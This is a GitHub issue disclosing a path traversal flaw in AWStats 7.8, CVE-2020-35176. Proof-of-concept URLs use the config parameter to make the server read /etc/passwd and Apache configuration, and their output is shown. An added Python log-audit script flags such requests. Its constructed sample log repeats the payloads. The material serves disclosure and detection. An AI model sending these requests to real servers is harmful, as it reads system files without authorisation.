Headline
CVE-2020-35176: path traversal flaw · Issue #195 · eldy/AWStats
In AWStats through 7.8, cgi-bin/awstats.pl?config= accepts a partial absolute pathname (omitting the initial /etc), even though it was intended to only read a file in the /etc/awstats/awstats.conf format. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000501 and CVE-2020-29600.
Hi,
It seems #90 is not completely fixed in 7.8.
(that is, even after CVE-2017-1000501 and CVE-2020-29600 are fixed)
Altering slightly the original example:
http://myserver.example.com/cgi-bin/awstats.pl?config=/etc/passwd
to e.g.:
http://myserver.example.com/cgi-bin/awstats.pl?config=passwd
Warning: Syntax error line 1 in file '/etc/passwd'. Config line is ignored.
Warning: Syntax error line 2 in file '/etc/passwd'. Config line is ignored.
Warning: Syntax error line 3 in file '/etc/passwd'. Config line is ignored.
http://myserver.example.com/cgi-bin/awstats.pl?config=/passwd
Warning: Syntax error line 1 in file '/etc//passwd'. Config line is ignored.
Warning: Syntax error line 2 in file '/etc//passwd'. Config line is ignored.
Warning: Syntax error line 3 in file '/etc//passwd'. Config line is ignored.
http://myserver.example.com/cgi-bin/awstats.pl?config=apache2/apache2.org
Warning: Syntax error line 80 in file '/etc/apache2/apache2.conf'. Config line is ignored.
Warning: Syntax error line 87 in file '/etc/apache2/apache2.conf'. Config line is ignored.
Warning: Syntax error line 92 in file '/etc/apache2/apache2.conf'. Config line is ignored.
It is still parsing /etc/*.
I’d expect it to only allow files within /etc/awstats/awstats*.conf.
Like #90, this requires that /etc/awstats/awstats.conf does not exist (e.g. in multi-hosting environments with no default config).
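
A log audit for the requests reported above, as an added example that is not part of the original issue or of AWStats itself. Because config=passwd contains no path separator, it compares each config value against the site names that have an awstats.<site>.conf file rather than searching for slashes. The file listing, log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed listing of /etc/awstats; on a real host use os.listdir("/etc/awstats").
CONF_FILES = ["awstats.www.example.com.conf", "awstats.shop.example.com.conf", "README"]

# Constructed access-log lines reusing the config values from the report.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Dec/2020:10:01:02 +0000] "GET /cgi-bin/awstats.pl?config=www.example.com HTTP/1.1" 200 5120
203.0.113.9 - - [10/Dec/2020:10:02:11 +0000] "GET /cgi-bin/awstats.pl?config=passwd HTTP/1.1" 200 812
203.0.113.9 - - [10/Dec/2020:10:02:15 +0000] "GET /cgi-bin/awstats.pl?config=/passwd HTTP/1.1" 200 812
203.0.113.9 - - [10/Dec/2020:10:02:19 +0000] "GET /cgi-bin/awstats.pl?config=apache2/apache2.org HTTP/1.1" 200 930
198.51.100.7 - - [10/Dec/2020:10:03:00 +0000] "GET /index.html?config=passwd HTTP/1.1" 200 100
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
CONF_RE = re.compile(r"^awstats\.(.+)\.conf$")


def allowed_sites(conf_files):
    """Site names for which an awstats.<site>.conf file exists."""
    return {m.group(1) for f in conf_files if (m := CONF_RE.match(f))}


def suspicious_requests(log_text, sites):
    """Return (client, config value) for awstats.pl hits naming an unknown site."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/awstats.pl"):
            continue
        # parse_qs percent-decodes, so config=%2Fpasswd is seen as "/passwd".
        for value in parse_qs(url.query, keep_blank_values=True).get("config", []):
            if value not in sites:
                hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG, allowed_sites(CONF_FILES)):
        print(f"{client} requested unknown config {value!r}")
```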